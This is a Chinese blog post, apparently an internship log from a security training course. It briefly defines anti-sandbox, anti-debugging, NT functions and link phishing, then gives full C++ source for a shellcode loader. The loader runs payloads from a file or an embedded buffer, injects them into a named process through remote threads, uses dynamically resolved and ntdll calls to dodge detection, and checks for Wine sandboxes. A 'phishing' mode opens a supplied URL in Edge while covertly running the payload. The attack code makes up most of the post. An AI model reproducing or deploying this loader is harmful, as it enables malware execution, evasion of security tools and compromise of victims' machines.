2024.7.18实习日志

最新推荐文章于 2024-09-14 20:04:15 发布
最新推荐文章于 2024-09-14 20:04:15 发布
阅读量805 收藏 19
点赞数 8
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74080792/article/details/140518347
版权

一、反沙箱、反虚拟机

概念:

        指绕过或逃避沙箱环境和虚拟机的安全措施,以执行恶意代码或进行攻击。攻击者可能会尝试识别和规避这些安全层,以便在目标系统上运行恶意软件或进行其他恶意活动。反沙箱和反虚拟机技术通常用于逃避安全检测和分析。

实现方式:
        检测虚拟化环境的特定特征,如检查虚拟化软件的进程、设备、文件系统或注册表的存在,以确定是否在虚拟机中运行。攻击者还可能检测虚拟化环境的性能特征,如CPU指令集、内存大小或网络配置等。通过识别这些特征,攻击者可以采取措施绕过沙箱或虚拟机的保护,从而执行恶意代码或进行攻击。

二、反调试

概念:

        指用于防止恶意软件被调试和分析的技术。

实现方式:

        检测调试器的存在、监视调试器的行为、修改调试器的行为或绕过调试器的检测等方法。攻击者利用这些技术来阻止安全研究人员或安全工具对恶意软件进行调试和分析,从而增加恶意软件的隐蔽性和持久性。

三、NT函数

概念:

        NT函数是Windows操作系统内核中的一种函数类型,用于执行各种系统级任务,如管理进程、文件系统、内存和设备等。这些函数提供了操作系统核心功能的接口,允许应用程序与操作系统进行交互和通信。

实现方式:

        通过Windows内核模块中的函数来实现,这些函数由微软开发并包含在操作系统内核中。应用程序可以通过系统调用或内核模式驱动程序来调用这些NT函数,以访问操作系统的核心功能和服务。NT函数的实现方式通常是通过调用内核模块中的函数来执行特定的系统级任务,以实现操作系统的各种功能

四、Link钓鱼

概念:

        Link钓鱼是一种网络钓鱼攻击技术,通过在电子邮件、社交媒体或其他通信渠道中发送虚假链接,诱使用户点击并访问恶意网站或下载恶意软件。

实现方式:

        攻击者通常会伪装成信任的实体或组织,诱使受害者点击链接并泄露个人信息、凭据或感染其设备。 Link钓鱼的实现方式包括创建看似真实的电子邮件、社交媒体帖子或广告,其中包含引诱受害者点击的链接。链接可能会指向伪装成合法网站的恶意网站,用于窃取信息或植入恶意软件。攻击者还可能利用社会工程技术,诱使受害者相信链接的真实性,从而增加点击率。要防范Link钓鱼攻击,用户应警惕未知来源的链接,避免点击可疑链接,并确保设备和软件保持最新的安全更新。

五、回调函数

概念:

        回调函数是一种在编程中常见的概念,它是指将一个函数作为参数传递给另一个函数,以便在特定事件发生时调用该函数。回调函数通常用于异步编程或事件驱动编程中,用于处理异步操作的完成或特定事件的发生。

实现方式:

        回调函数的实现方式是将函数的指针或引用传递给另一个函数,并在需要时由该函数调用。当满足特定条件或事件发生时,调用方会调用回调函数来执行特定的操作或逻辑。回调函数的灵活性使其在许多编程语言和框架中被广泛应用,用于处理各种情况下的回调逻辑。

六、实例

源文件:

#include "myFunc.h"

#include<string>

wchar_t* AtoW(char** a) {

    setlocale(LC_ALL, "");

    // 原始的char*字符串

    char* char_str = *a;

    // 确定所需的wchar_t缓冲区的大小

    size_t wchar_size = mbstowcs(NULL, char_str, 0) + 1;

    if (wchar_size == (size_t)-1) {

        perror("mbstowcs");

        return 0;

    }

    // 分配wchar_t缓冲区

    wchar_t* wchar_str = (wchar_t*)malloc(wchar_size * sizeof(wchar_t));

    if (wchar_str == NULL) {

        perror("malloc");

        return 0;

    }

    // 执行转换

    mbstowcs(wchar_str, char_str, wchar_size);

    return wchar_str;

}

//读取shellcode

char* ReadFile(SIZE_T* length, char* file) {

    char* filename = file;

    ifstream infile;

    infile.open(filename, ios::out | ios::binary);

    infile.seekg(0, infile.end);

    *length = infile.tellg();

    infile.seekg(0, infile.beg);

    char* data = new char[*length];

    if (infile.is_open()) {

        cout << "reading from the file" << endl;

        infile.read(data, *length);

    }

    return data;

}

//注入进程

void Inject(char* argv[]) {

    SIZE_T length = 0;

    char* data;

    data = ReadFile(&length, argv[2]);

    HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);   //快照(留像)

    if (snapshot_handle != INVALID_HANDLE_VALUE) {

        // 枚举进程

        PROCESSENTRY32 process_entry;

        process_entry.dwSize = sizeof(PROCESSENTRY32);

        if (Process32First(snapshot_handle, &process_entry)) {

            do {

                // 将进程名转换为宽字符串

                std::wstring extFileName(process_entry.szExeFile);

                wchar_t* exename = AtoW(&argv[3]);

                // 如果进程名包含 "msedge.exe" 则进行以下操作  std::string::npos == 当初遍历的进程名

                if (extFileName.find(exename) != std::string::npos) {

                    // 打开进程

                    fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");

                    HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);

                    if (process_handle != NULL) {

                        // 在远程进程中分配内存

                        fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");

                        LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

                        if (remote_buffer != NULL) {

                            SIZE_T bytes_written;

                            // 将 code 写入远程进程内存

                            if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {

                                std::cout << "Remote buffer address: " << remote_buffer << std::endl;

                                // 在远程进程中创建线程执行 code

                                HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);

                                if (remote_thread != NULL) {

                                    // 等待线程结束

                                    WaitForSingleObject(remote_thread, INFINITE);

                                    CloseHandle(remote_thread);

                                }

                            }

                            // 关闭远程内存句柄

                            CloseHandle(remote_buffer);

                        }

                        // 关闭进程句柄

                        CloseHandle(process_handle);

                    }

                }

            } while (Process32Next(snapshot_handle, &process_entry)); // 继续枚举下一个进程

        }

        // 关闭进程快照句柄

        CloseHandle(snapshot_handle);

    }

}

//读取文件正常上线

VOID Normal(char* file) {

    SIZE_T length = 0;

    char* data = NULL;

    data = ReadFile(&length, file);

    fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");

    fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");

    

    LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);

    memcpy(shell_addr, data, length);

    HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);

    WaitForSingleObject(HThread, -1);

}

//直接到缓存区上线

void Direct() {

    size_t length;

    unsigned char* data = assemble_data(&length);

    fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");

    fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");

    LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);

    memcpy(shell_addr, data, length);

    HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);

    WaitForSingleObject(HThread, -1);

}

void NtCall(char* file) {

        SIZE_T length = 0;

        char* data = NULL;

        data = ReadFile(&length, file);

        

        fn_NtAllocateVirtualMemory myNtAllocateVirtualMemory = (fn_NtAllocateVirtualMemory)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtAllocateVirtualMemory");

        fn_NtCreateThreadEx myNtCreateThreadEx = (fn_NtCreateThreadEx)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");

        HANDLE hRemoteThread = NULL;

        HANDLE process = GetCurrentProcess();

        LPVOID shell_addr = NULL;

        myNtAllocateVirtualMemory(GetCurrentProcess(),&shell_addr, 0,(PULONG)&length, 0x00001000, 0x40);

        memcpy(shell_addr, data, length);

        myNtCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, process, (LPTHREAD_START_ROUTINE)shell_addr, NULL, 0, 0, 0, 0, 0);

        WaitForSingleObject(hRemoteThread, -1);

}

//反杀箱,反虚拟机

void CheckSandBox() {

    //vbox_network_share();

    Check_MulDiv_1();

    Check_MulDiv_2();

}

void Fish(char web[]) {

    char command[512] ="\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\""; // 确保缓冲区足够大以容纳完整命令

    strcat(command, web);

    STARTUPINFOA si;

    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));

    si.cb = sizeof(si);

    ZeroMemory(&pi, sizeof(pi));

    CreateProcessA(NULL,

        command,

        0,

        0,

        FALSE,

        0,

        NULL,

        NULL,

        &si,

        &pi

    );

    Direct();

}

int main(int argc, char* argv[]) {

    if (argc > 1) {

        if (strcmp(argv[1], "-i") == 0) {

            if (argc == 4) {

                printf("Injecting!!!\n");

                Inject(argv);

            }

            else {

                printf("注入方式:-i 路径 进程名\n");

            }

        }

        if (strcmp(argv[1], "-d") == 0) {

            Normal(argv[2]);

        };

        if (strcmp(argv[1], "-h") == 0) {

            printf("-i Inject\n-h help\n-d normal\n");

        }

        if (strcmp(argv[1], "-s") == 0) {

            CheckSandBox();

        }

        if (strcmp(argv[1], "-n") == 0) {

            if (argc != 3) {

                printf("需要Shellcode路径\n");

            }

            NtCall(argv[2]);

        }

        if (strcmp(argv[1], "-g") == 0) {

            char web[50];

            printf("Input Web:");

            scanf("%s", &web);

            Fish(web);

        }

    }

    if (argc == 1) {

        Direct();

    }

    return 0;

}

头文件:

SandBox.h

#pragma once

#include"myFunc.h"

int Check_MulDiv_1() {

    // Call MulDiv with specific arguments

    int result = MulDiv(1, 0x80000000, 0x80000000);

    // Check if the result matches the expected value

    if (result != 2) {

        std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;

    }

    else {

        std::cout << "MulDiv evasion method not detected." << std::endl;

    }

    return 0;

}

int Check_MulDiv_2() {

        // Check for the existence of Wine's exclusive APIs

        HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");

        FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");

        HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");

        FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");

    

        if (wineGetUnixFileName || wineGetHostVersion) {

            std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;

        }

        else {

            std::cout << "Wine's exclusive APIs not detected." << std::endl;

        }

    

        return 0;

    }

MyFunc.h

#pragma once

#include<Windows.h>

#include <tlhelp32.h>

#include <fstream>

#include<iostream>

#include"data.h"

#include"SandBox.h"

using namespace std;

typedef LPVOID(WINAPI* fn_VirtualAllocEx)(

    HANDLE hProcess,

    LPVOID lpAddress,

    SIZE_T dwSize,

    DWORD  flAllocationType,

    DWORD  flProtect

    );

typedef HANDLE(WINAPI* fn_OpenProcess)(

    _In_ DWORD dwDesiredAccess,

    _In_ BOOL bInheritHandle,

    _In_ DWORD dwProcessId

    );

typedef LPVOID(WINAPI* fn_VirtualAlloc)(

    _In_opt_ LPVOID lpAddress,

    _In_     SIZE_T dwSize,

    _In_     DWORD flAllocationType,

    _In_     DWORD flProtect

    );

typedef HANDLE (WINAPI* fn_CreateThread)(

    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,

    _In_ SIZE_T dwStackSize,

    _In_ LPTHREAD_START_ROUTINE lpStartAddress,

    _In_opt_ __drv_aliasesMem LPVOID lpParameter,

    _In_ DWORD dwCreationFlags,

    _Out_opt_ LPDWORD lpThreadId

);

typedef NTSTATUS (NTAPI* fn_NtAllocateVirtualMemory)(

 HANDLE               ProcessHandle,

 PVOID* BaseAddress,

 ULONG                ZeroBits,

 PULONG           RegionSize,

 ULONG                AllocationType,

 ULONG                Protect);

typedef DWORD(NTAPI* fn_NtCreateThreadEx)(

    PHANDLE ThreadHandle, //指向线程句柄的指针

    ACCESS_MASK DesiredAccess,

    LPVOID ObjectAttributes,

    HANDLE ProcessHandle, //进程句柄

    LPTHREAD_START_ROUTINE lpstartAddress, //要执行的函数

    LPVOID lpParameter, //函数的参数

    ULONG CreateThreadFlags,

    SIZE_T ZeroBits,

    SIZE_T StackSize,

    SIZE_T MaximumStackSize,

    LPVOID pUnknow

    );

milk-1
关注
2024.7.14生产实习日志
HeNan4312的博客
07-14 870
indows 安全中心(也称为 WindowsDefender)将成为默认的防病毒和安全解决方案。它是可用的最大补救措施之一。windows安全中心是windows系统的一个安全综合控制面板,包含有防火墙状态提示,杀毒软件状态提示, 自动更新提示等系统基本安全信息。据微软统计显示,Windows设备中,超过50%的人都是靠Defener作为主要的防病毒软件,剩下的用户会禁用或者安装三方杀软。值得一提的是,在德国权威机构AV-
2024.7.16生产实习日志
HeNan4312的博客
07-17 1147
使用函数指针来定义函数的类型,以便在动态库中找到的函数能够正确地调用。函数指针的类型必须与函数的签名(参数类型和返回类型)匹配。
2024.7.15生产实习日志
HeNan4312的博客
07-16 575
FinalShell是一款免费的国产的集SSH工具、服务器管理、远程桌面加速的良心软件,同时支持Windows,macOS,Linux,它不单单是一个SSH工具,完整的说法应该叫一体化的的服务器,网络管理软件,在很大程度上可以免费替代XShell,是国产中不多见的良心产品,具有免费海外服务器远程桌面加速,ssh加速,双边tcp加速,内网穿透等特色功能下载地址云服务器ECS,即Elastic Compute Service,翻译过来是弹性云计算服务,ECS是什么意思?
2024.7.13生产实习日志
HeNan4312的博客
07-14 947
通过本次认知实习,我懂得了许多经验和道理,明确了自身今后发展的大致方向。同时也让我学到了很多课堂上跟本学不到的东西,例如ICT等。自己也看清了自己的人生方向,认识到了计算机工作应当保持仔细认真的工作态度,要怀有一种平和的心态与不耻下问的精神,不论遇到什么事都要从多方面去思考,多听别人的建议与意见,不要太过急燥,要对自己所做的事去负责,不要轻易承诺,承诺了就要努力去兑现。
2024.7.17 生产实习日志
a12313111的博客
07-17 426
伪造图标或详细信息通常是指在未经授权的情况下复制、修改或创造图形标识、商标、证书、证件、电子文件图标等,以欺骗他人认为它们是真实或官方的。在软件或计算机领域,伪造图标可能指恶意软件或病毒为了诱导用户点击或执行,将其图标伪装成合法程序的图标。伪造图标和详细信息是指通过修改可执行文件的资源部分,来改变文件在文件管理器中的显示内容。详细信息伪造:修改文件属性,如版本号、公司名称、描述等,使文件看起来像是来自可信来源。图标伪造:通过修改资源段,将合法软件的图标替换到恶意软件中。-I:指定输入文件或目录。
2024.7.16 生产实习日志
a12313111的博客
07-16 272
PEB 是一个包含关于当前进程的许多信息的数据结构。它是由 Windows 操作系统在创建进程时创建的,存储在每个进程的用户模式地址空间中。PEB 结构体包含了有关进程的各种信息,例如模块列表、环境变量、全局标志等。
2024.7.15实习日志
m0_74080792的博客
07-15 462
下午,我使用FinalShell软件成功将Windows中的文件上传到Linux,并下载了Java JDK。运行命令:tar -zxvf ./jdk17.tar.gz,将压缩包的内容解压到 /usr/local/java/ 目录下。中下载适合版本的jdk,下载完成后,将压缩包上传至linux的/usr/local/java 目录下。执行命令:source /etc/profile,让系统重新读取环境变量,让新的系统环境变量配置生效。# Java JDK 的家目录,指定安装的 JDK 的根目录。
2024.7.14 实习日志
a12313111的博客
07-14 507
MessageBox指的是显示一个模态对话框,其中包含一个系统图标、 一组按钮和一个简短的特定于应用程序消息,如状态或错误的信息。③基于行为的恶意软件检测:对敏感行为进行实时监控,如果某一程序有如常见恶意代码的行为,则视其为恶意软件,是启发式的延申。检测一点(内存空间小,运行时间(沙箱环境中,时间流速较快),主机名,CPU核心数,进程数量,io设备数量)①基于特征码进行检测:杀毒软件的病毒库记录了一些恶意软件的特征码,检测时提取特征码和库内做比对来判断。检测可以行为:注册表,计划任务,添加用户,加驱动。
2024.7.16实习日志
m0_74080792的博客
07-16 889
这种做法可以使程序更加灵活,可以根据不同的需求传递不同的参数,而不需要修改源代码。通过程序参数分离,可以实现程序的参数化配置,提高程序的可定制性和可重用性。在Cobalt Strike主界面中选择一个Beacon,进入交互模式,执行“screenshot”命令,获得此刻目标主机当前用户的桌面截图,将截图传回团队服务器。Windows API函数,用于枚举指定窗口站的所有桌面,作用是列出指定窗口站中的所有桌面名称。lpEnumFunc: 指向一个回调函数的指针,用于处理枚举过程中的每个子窗口。
高级语言课程设计(1.5周)基本要求2024.ppt
06-22
- **时间安排**: 2024年6月19日至6月28日,每天13:00至18:00。 - **地点**: 大数据基础实验室FZ443。 - **主要目的**: - 强化学生的实践能力,加深他们对高级语言程序设计(特别是C语言)的理解。 - 提高学生的...
2024年Unity 面试题 |五萬字 二佰道| Unity面试题大全,面试题总结【全网最全,收藏一篇足够面试】
热门推荐
努力前行,总会成为自己心中的那道光
02-23 12万+
正所谓 金三银四 ,又到了找工作的大好时机了,不知道大家有没有意向找一份更好的工作呢~ 之前写了很多Unity的学习和实例文章,但是面试题部分还没有一个系统的整理。 那本篇文章就来整理一下Unity中一些常见的面试题,说不准就会面试的时候就会遇到! 本篇文章会将Unity所有方面的面试资料都融会贯通,绝对是2022年Unity面试领域最实用的文章啦!
从零开始仿写一个抖音App——日志和埋点以及后端初步架构(1)
goodhighting的博客
04-19 963
最后对于程序员来说,要学习的知识内容、技术有太多太多,要想不被环境淘汰就只有不断提升自己,从来都是我们去适应环境,而不是环境来适应我们!这里附上上述的技术体系图相关的几十套腾讯、头条、阿里、美团等公司2021年的面试题,把技术点整理成了视频和PDF(实际上比预期多花了不少精力),包含知识脉络 + 诸多细节,由于篇幅有限,这里以图片的形式给大家展示一部分。
Java微服务分布式事务框架seata,字节跳动Python实习面试凉凉经
m0_60635321的博客
04-21 847
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
时间&安全精细化管理平台存在未授权访问漏洞
最新发布
2301_77012231的博客
09-14 407
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
2024 年浙江省网络安全行业网络安全运维工程师项目 职业技能竞赛网络安全运维工程师(决赛样题)
Aluxian_的博客
09-13 853
作为一名网络安全运维工程师,你发现公司的内部网络出现了异常流量,多个关键应用程序的响应速度显著下降,你需要对网络流量进行深入分析,识别潜在的安全威胁,追踪可疑活动,以确保公司数据的安全性。
企业如何构建有效的数据泄露防护安全体系
A526847的博客
09-14 718
在当今数字化时代,企业数据已成为核心资产,其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发,不仅会导致经济损失,还可能损害企业声誉和客户关系。因此,构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。
构建常态化安全防线:XDR的态势感知与自动化响应机制
安胜ANSCEN的博客
09-11 1039
一款基于XDR理念的一站式安全运营平台,由长年实战对抗中形成的攻防知识经验指导设计,结合大数据、大模型与安全编排自动化响应技术,提供全局监测预警、自动化研判、智能响应、联防联控等能力,体系化提升全局态势感知和主动防御能力,规范化安全运营协同管理工作。星盾作为企业网络安全体系的安全大脑通过汇聚传统安全设备的数据,形成覆盖云、网、边、端全维度的神经元体系,实现跨边界、跨区域、跨设备的全方位安全检测和响应,为全局的安全态势感知、风险评估、资产台账管理、上下联动与协同等安全运营工作提供一站式解决方案。
网站被爬,数据泄露,如何应对不断强化的安全危机?
weixin_53378048的博客
09-12 995
这些特性使得快快网络WAF能够在各种复杂的网络环境中稳定运行,高效识别并拦截恶意流量,通过智能分析和行为检测技术,大大降低了正常流量被误判为恶意流量的可能性,确保合法用户的访问不受影响以及保障了对威胁的精准判断和处理。在业务安全方面,电商企业频繁遭遇包括恶意薅羊毛及库存侵占在内的多种恶意行为侵扰,吸引了大量“薅羊毛”群体的关注,这些群体通过高度组织化与自动化的技术手段,形成了一整套黑色产业链,其规模之庞大、手段之高效,对电商企业构成了巨大的经济压力与业务风险,成为企业亟需解决的首要业务安全问题。
Python pandas.DataFrame.loc用法深度解析
df = pd.DataFrame([[1,2],[4,5],[7,8]], index=['cobra','viper','sidewinder'], columns=['max_speed','shield']) ``` 2. 选择单个标签。例如,通过标签'viper'选择一行,会返回一个Series,包含'viper'行的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值